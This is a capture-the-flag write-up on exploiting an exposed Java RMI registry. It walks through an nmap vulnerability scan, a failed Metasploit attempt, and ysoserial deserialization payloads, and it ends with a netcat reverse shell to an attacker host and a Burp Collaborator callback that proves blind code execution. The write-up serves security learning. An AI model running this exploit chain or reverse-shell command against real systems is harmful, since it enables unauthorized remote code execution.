As the challange description says we can nmap this port.

```  
Nmap scan report for jh2i.com (161.35.252.71)  
Host is up (0.14s latency).

PORT STATE SERVICE VERSION  
50028/tcp open java-rmi Java RMI  
```

After some googling i tried this nmap script which showed vulnerable.

```  
nmap -sV --script "rmi-vuln-classloader" -p 50028 jh2i.com  
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 09:57 MSK  
Nmap scan report for jh2i.com (161.35.252.71)  
Host is up (0.14s latency).

PORT STATE SERVICE VERSION  
50028/tcp open java-rmi Java RMI  
| rmi-vuln-classloader:  
| VULNERABLE:  
| RMI registry default configuration remote code execution vulnerability  
| State: VULNERABLE  
| Default configuration of RMI registry allows loading classes from remote
URLs which can lead to remote code execution.  
|  
| References:  
|_ https://github.com/rapid7/metasploit-
framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb  
```

There is a metasploit module to exploit this kind of configurations, but for
unknown reason exploit failed (RMI did not fetch remote class from my url)

```  
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started HTTP reverse handler on http://<attacker_ip>:13001  
[*] 161.35.252.71:50028 - Using URL: http://<attacker_ip>:8080/4rAP7YrTVS4Ad  
[*] 161.35.252.71:50028 - Server started.  
[*] 161.35.252.71:50028 - Sending RMI Header...  
[*] 161.35.252.71:50028 - Sending RMI Call...  
[-] 161.35.252.71:50028 - Exploit failed: RuntimeError Exploit aborted due to
failure unknown The RMI class loader couldnt find the payload  
[*] 161.35.252.71:50028 - Server stopped.  
[*] Exploit completed, but no session was created.  
```

After that i googled more info about how RMI works and i discovered it uses
java serealization. Thats when i downloaded fresh `ysoserial.jar` and started
to play with it.  
`ysoserial` has different payloads and cause i have no idea which classes are
loaded on our target i went down a list. Most of payloads were crashing with
an error:  
```  
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception
is:  
java.lang.ClassNotFoundException: <class_name_from_ysoserial_payload>  
```  
However when i used this command the error was different:

`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028
Jdk7u21 'ping -c 1 8bkxpcnklb88m503jvyao24rui08ox.burpcollaborator.net'`

I went to check my collaborator window and it had DNS requests! That means we
have blind code execution :)

![dns_requests](https://sun6-14.userapi.com/31FQUE5JPhK1qs21OfcwWf91M8zXhtgcq38bVg/_HPgL1IY-
xk.jpg)

After that i tried some reverse shell payloads and luckily for me target had
old `nc` which supported `-e` flag. So i fired next command:

`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028
Jdk7u21 'nc -e /bin/sh <attacker_ip> 1337'`

And on my box on port 1337 i got shell!

```  
nc -lvnp 1337  
listening on [any] 1337 ...  
connect to [<attacker_ip>] from (UNKNOWN) [142.93.62.145] 48634  
id  
uid=1000(user) gid=1000(user) groups=1000(user)  
ls  
flag.txt  
cat flag.txt  
flag{why_is_my_roommate_so_serious}  
```

Thanks for reading:)